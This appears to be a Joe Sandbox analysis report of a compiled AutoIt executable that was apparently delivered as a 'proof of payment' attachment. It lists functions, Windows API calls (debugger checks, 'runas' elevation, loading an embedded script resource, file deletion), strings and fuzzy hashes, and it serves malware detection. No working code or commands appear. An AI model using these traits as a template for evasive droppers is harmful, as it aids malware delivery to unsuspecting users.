windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00FB3AA3,?), ref: 00FB3D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00FB3AA3,?), ref: 00FB3D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,01071148,01071130,?,?,?,?,00FB3AA3,?), ref: 00FB3DC8

Part of subcall function 00FB6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FB3DEE,01071148,?,?,?,?,?,00FB3AA3,?), ref: 00FB6471

SetCurrentDirectoryW.KERNEL32(?,?,?,00FB3AA3,?), ref: 00FB3E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010628F4,00000010), ref: 01021CCE
SetCurrentDirectoryW.KERNEL32(?,01071148,?,?,?,?,?,00FB3AA3,?), ref: 01021D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0104DAB4,01071148,?,?,?,?,?,00FB3AA3,?), ref: 01021D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00FB3AA3), ref: 01021D90

Part of subcall function 00FB3E6E: GetSysColorBrush.USER32(0000000F), ref: 00FB3E79
Part of subcall function 00FB3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00FB3E88
Part of subcall function 00FB3E6E: LoadIconW.USER32(00000063), ref: 00FB3E9E
Part of subcall function 00FB3E6E: LoadIconW.USER32(000000A4), ref: 00FB3EB0
Part of subcall function 00FB3E6E: LoadIconW.USER32(000000A2), ref: 00FB3EC2
Part of subcall function 00FB3E6E: RegisterClassExW.USER32(?), ref: 00FB3F30

Part of subcall function 00FB36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB36E6
Part of subcall function 00FB36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3707
Part of subcall function 00FB36B8: ShowWindow.USER32(00000000,?,?,?,?,00FB3AA3,?), ref: 00FB371B
Part of subcall function 00FB36B8: ShowWindow.USER32(00000000,?,?,?,?,00FB3AA3,?), ref: 00FB3724

Part of subcall function 00FB4FFC: _memset.LIBCMT ref: 00FB5022
Part of subcall function 00FB4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB50CB

Strings

This is a third-party compiled AutoIt script., xrefs: 01021CC8
runas, xrefs: 01021D84

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: 467ac0f312714bb948072fcb3ef21cf4778cbb2c726222890a0e7cddc2f03780
Instruction ID: 6e05c3042ca08c34aa0f68086a7dbbcd10b99735175fa13b25f6275fdfb4171c
Opcode Fuzzy Hash: 467ac0f312714bb948072fcb3ef21cf4778cbb2c726222890a0e7cddc2f03780
Instruction Fuzzy Hash: 07513D31E44248AACF21BBF6EC42EED7B79AF15740F004069F5916B1C6DA7D8609EF21

Function 00FCDDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00FCDDEC
GetCurrentProcess.KERNEL32(00000000,0104DC38,?,?), ref: 00FCDEAC
GetNativeSystemInfo.KERNELBASE(?,0104DC38,?,?), ref: 00FCDF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 00FCDF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 00FCDF1F
GetSystemInfo.KERNEL32(?,0104DC38,?,?), ref: 00FCDF29
GetSystemInfo.KERNEL32(?,0104DC38,?,?), ref: 00FCDF35

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: de270d131daf2ccdaa77d6a3c26df1ad9d2ed603a2ad8dfa7ceab9aaba4e8f7d
Instruction ID: 9b0bcc571f481cab97f28a85166698a3de9e3c5c88798ce0adf8c922b4820262
Opcode Fuzzy Hash: de270d131daf2ccdaa77d6a3c26df1ad9d2ed603a2ad8dfa7ceab9aaba4e8f7d
Instruction Fuzzy Hash: CA61F5B180A395DFCF15CFA899C16EE7FB46F29304B1985EDD8849F20BC624C508DB65

Function 00FB406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FB449E,?,?,00000000,00000001), ref: 00FB407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FB449E,?,?,00000000,00000001), ref: 00FB4092
LoadResource.KERNEL32(?,00000000,?,?,00FB449E,?,?,00000000,00000001,?,?,?,?,?,?,00FB41FB), ref: 01024F1A
SizeofResource.KERNEL32(?,00000000,?,?,00FB449E,?,?,00000000,00000001,?,?,?,?,?,?,00FB41FB), ref: 01024F2F
LockResource.KERNEL32(00FB449E,?,?,00FB449E,?,?,00000000,00000001,?,?,?,?,?,?,00FB41FB,00000000), ref: 01024F42

Strings

SCRIPT, xrefs: 00FB4088

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 47b265e7867a651c90cfbb5d60ff5299e4c02c87e0e8375a5f4d5ef8bfebf942
Instruction ID: 69995fa2b2b6a4284dd996ed5d9ee4dda00d3d6c19500eb78cc8cc50570dce67
Opcode Fuzzy Hash: 47b265e7867a651c90cfbb5d60ff5299e4c02c87e0e8375a5f4d5ef8bfebf942
Instruction Fuzzy Hash: 80118871200301AFE7219B66ED48F637BBDEBC5B60F10452CF64286290DA62E8009B31

Function 00FF6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,01022F49), ref: 00FF6CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00FF6CCA
FindClose.KERNEL32(00000000), ref: 00FF6CDA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 9d85b1c3779fd5f953afba7626a1380a21ed21d121d9cb91ae12d6a131c20abd
Instruction ID: a211f230dbf7606d1cd2ca20e159e0468a0e88d41b4725ac7c60e6c99d7c0f91
Opcode Fuzzy Hash: 9d85b1c3779fd5f953afba7626a1380a21ed21d121d9cb91ae12d6a131c20abd
Instruction Fuzzy Hash: EBE0DF31814419AB82206778EC0D8FA37ACEE0633AF500706FAF2C21E0EB75D900A7D6

Function 00FC3B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 00FC4176

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: 937a3ad8395d5e51160c84de552b17559c2c3a87d455f1851e5d37315b136f60
Instruction ID: 272aa2b00290ba3fc397802c9152f7b3488f14146bf2d405b6d2924784a98c11
Opcode Fuzzy Hash: 937a3ad8395d5e51160c84de552b17559c2c3a87d455f1851e5d37315b136f60
Instruction Fuzzy Hash: B872DE31E0020A9FCB14DF98CA82FAEB7B5EF48350F14C05DE946AB251D735AE45EB91

Function 00FC3200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: fa4d9adf52a1e44e1d9d9fc90f4c59bc340840c0d744ae32daca2fe408634691
Instruction ID: 4d532cd5c15be46827d12ae137e577435a1ade43019d98d006ccbba89840f499
Opcode Fuzzy Hash: fa4d9adf52a1e44e1d9d9fc90f4c59bc340840c0d744ae32daca2fe408634691
Instruction Fuzzy Hash: D392AC706083528FD724CF18C581F6ABBE1FF88348F14885DE98A8B392D775E945DB92

Function 00FBE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBE959
timeGetTime.WINMM ref: 00FBEBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBED2E
TranslateMessage.USER32(?), ref: 00FBED3F
DispatchMessageW.USER32(?), ref: 00FBED4A
LockWindowUpdate.USER32(00000000), ref: 00FBED79
DestroyWindow.USER32 ref: 00FBED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBED9F
Sleep.KERNEL32(0000000A), ref: 01025270
TranslateMessage.USER32(?), ref: 010259F7
DispatchMessageW.USER32(?), ref: 01025A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 01025A19

Strings

@GUI_WINHANDLE, xrefs: 01025360
@GUI_CTRLHANDLE, xrefs: 010253AC
@GUI_CTRLID, xrefs: 01025314
@TRAY_ID, xrefs: 010254C9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: f40186cfc9c9ce5e1ac1a20c92b8467e14e34be88f303b2f6c5e5392582d833e
Instruction ID: bf16edc6c6d9554a4e078afb2b94f892775ac4bcdc94d09c998fea2a923fda05
Opcode Fuzzy Hash: f40186cfc9c9ce5e1ac1a20c92b8467e14e34be88f303b2f6c5e5392582d833e
Instruction Fuzzy Hash: F362B0706043409FEB24DF25C885BEA77E8BF84314F04496DF9869B292DBB9D848DF52

Function 00FE5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00FE5EC3
___createFile.LIBCMT ref: 00FE5F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00FE5F2D
__dosmaperr.LIBCMT ref: 00FE5F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00FE5F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00FE5F6A
__dosmaperr.LIBCMT ref: 00FE5F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00FE5F7C
__set_osfhnd.LIBCMT ref: 00FE5FAC
__lseeki64_nolock.LIBCMT ref: 00FE6016
__close_nolock.LIBCMT ref: 00FE603C
__chsize_nolock.LIBCMT ref: 00FE606C
__lseeki64_nolock.LIBCMT ref: 00FE607E
__lseeki64_nolock.LIBCMT ref: 00FE6176
__lseeki64_nolock.LIBCMT ref: 00FE618B
__close_nolock.LIBCMT ref: 00FE61EB

Part of subcall function 00FDEA9C: CloseHandle.KERNELBASE(00000000,0105EEF4,00000000,?,00FE6041,0105EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00FDEAEC
Part of subcall function 00FDEA9C: GetLastError.KERNEL32(?,00FE6041,0105EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00FDEAF6
Part of subcall function 00FDEA9C: __free_osfhnd.LIBCMT ref: 00FDEB03
Part of subcall function 00FDEA9C: __dosmaperr.LIBCMT ref: 00FDEB25

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

__lseeki64_nolock.LIBCMT ref: 00FE620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00FE6342
___createFile.LIBCMT ref: 00FE6361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00FE636E
__dosmaperr.LIBCMT ref: 00FE6375
__free_osfhnd.LIBCMT ref: 00FE6395
__invoke_watson.LIBCMT ref: 00FE63C3
__wsopen_helper.LIBCMT ref: 00FE63DD

Strings

@, xrefs: 00FE5F98

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: b2db66110c9c9139bcee0111605381d703a39f775f06f51c1ea6978514554969
Instruction ID: 79e698737af47ab142b1167ec2f3140cb168a7d3457168c67c721cb15c545ac1
Opcode Fuzzy Hash: b2db66110c9c9139bcee0111605381d703a39f775f06f51c1ea6978514554969
Instruction Fuzzy Hash: 29225671D046899FEF259F69CC45BAD7B22EB24378F284229E521DB2D1C3398D40F751

Function 00FDEE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: d3a5f0470b4488ca5791faa499719eb7c607d4226d95feeeff6925105705d54e
Instruction ID: 114bdcbde5134503b557e72fcca9d9ac7a61cd79553118f374c88d50c87e56ab
Opcode Fuzzy Hash: d3a5f0470b4488ca5791faa499719eb7c607d4226d95feeeff6925105705d54e
Instruction Fuzzy Hash: B1323771E04281DFDB219F58D840FAD7BB2AF46320F2D416BE8969F386C7359846E760

Function 00FFFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 00FFFA96
_wcschr.LIBCMT ref: 00FFFAA4
_wcscpy.LIBCMT ref: 00FFFABB
_wcscat.LIBCMT ref: 00FFFACA
_wcscat.LIBCMT ref: 00FFFAE8
_wcscpy.LIBCMT ref: 00FFFB09
__wsplitpath.LIBCMT ref: 00FFFBE6
_wcscpy.LIBCMT ref: 00FFFC0B
_wcscpy.LIBCMT ref: 00FFFC1D
_wcscpy.LIBCMT ref: 00FFFC32
_wcscat.LIBCMT ref: 00FFFC47
_wcscat.LIBCMT ref: 00FFFC59
_wcscat.LIBCMT ref: 00FFFC6E

Part of subcall function 00FFBFA4: _wcscmp.LIBCMT ref: 00FFC03E
Part of subcall function 00FFBFA4: __wsplitpath.LIBCMT ref: 00FFC083
Part of subcall function 00FFBFA4: _wcscpy.LIBCMT ref: 00FFC096
Part of subcall function 00FFBFA4: _wcscat.LIBCMT ref: 00FFC0A9
Part of subcall function 00FFBFA4: __wsplitpath.LIBCMT ref: 00FFC0CE
Part of subcall function 00FFBFA4: _wcscat.LIBCMT ref: 00FFC0E4
Part of subcall function 00FFBFA4: _wcscat.LIBCMT ref: 00FFC0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00FFFA61

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 845d117e307ce1663894270a3dcf41a57dcb763342284a5b8abe7f5aefeff39a
Instruction ID: 42f8096535b32d465023875af3e4d17cb19228926899fd557fd1ae0a23c7f7e7
Opcode Fuzzy Hash: 845d117e307ce1663894270a3dcf41a57dcb763342284a5b8abe7f5aefeff39a
Instruction Fuzzy Hash: 3191B3715042059FDB10EB50CC41FAAB3E9BF84310F084969FA599B2A1DF78E948DB91

Function 00FB3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FB3F86
RegisterClassExW.USER32(00000030), ref: 00FB3FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB3FC1
InitCommonControlsEx.COMCTL32(?), ref: 00FB3FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB3FEE
LoadIconW.USER32(000000A9), ref: 00FB4004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB4013

Strings

0, xrefs: 00FB3F68
AutoIt v3 GUI, xrefs: 00FB3FA2
+, xrefs: 00FB3F6F
TaskbarCreated, xrefs: 00FB3FB6

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 086780c730722681c541339d50b44ca07df77e0d2cb41257e8e048cdf43eb644
Instruction ID: 51380eff89389aa4b531ad080a45b0912c29ab004eed91c7c5f97e65d11aa8a8
Opcode Fuzzy Hash: 086780c730722681c541339d50b44ca07df77e0d2cb41257e8e048cdf43eb644
Instruction Fuzzy Hash: 4221C7B5E00359AFDB20DFE5E889BCDBBB8FB08710F00411AF591B6284D7BA45448F91

Function 00FFBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FFBDB4: __time64.LIBCMT ref: 00FFBDBE

Part of subcall function 00FB4517: _fseek.LIBCMT ref: 00FB452F

__wsplitpath.LIBCMT ref: 00FFC083

Part of subcall function 00FD1DFC: __wsplitpath_helper.LIBCMT ref: 00FD1E3C

_wcscpy.LIBCMT ref: 00FFC096
_wcscat.LIBCMT ref: 00FFC0A9
__wsplitpath.LIBCMT ref: 00FFC0CE
_wcscat.LIBCMT ref: 00FFC0E4
_wcscat.LIBCMT ref: 00FFC0F7
_wcscmp.LIBCMT ref: 00FFC03E

Part of subcall function 00FFC56D: _wcscmp.LIBCMT ref: 00FFC65D
Part of subcall function 00FFC56D: _wcscmp.LIBCMT ref: 00FFC670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FFC2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FFC338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FFC34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FFC35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FFC371

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 74c6fd3bf82fdaded927b0093e6df23fa57d23ce5e9b2d19785b80972a541d85
Instruction ID: 125b5e41d43dbc1d22657500b0c3713774a2ab2d853848844cec97992fe83aa7
Opcode Fuzzy Hash: 74c6fd3bf82fdaded927b0093e6df23fa57d23ce5e9b2d19785b80972a541d85
Instruction Fuzzy Hash: 17C129B1D0022DAADF25DF95CD81EEEB7BDAF49310F0040AAF609E6151DB349A449FA1

Function 00FB3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00FB37B3
KillTimer.USER32(?,00000001), ref: 00FB37DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FB3800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB380B
CreatePopupMenu.USER32 ref: 00FB381F
PostQuitMessage.USER32(00000000), ref: 00FB382E

Strings

TaskbarCreated, xrefs: 00FB3806

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 40b8069b545f0250c1b6227eb934e5a98a973bb5cdef7609c5acae49cc0047f6
Instruction ID: 6ab73a6e2d048c53b486a3d59b53a6289852766ddb930e7010521462019bb84d
Opcode Fuzzy Hash: 40b8069b545f0250c1b6227eb934e5a98a973bb5cdef7609c5acae49cc0047f6
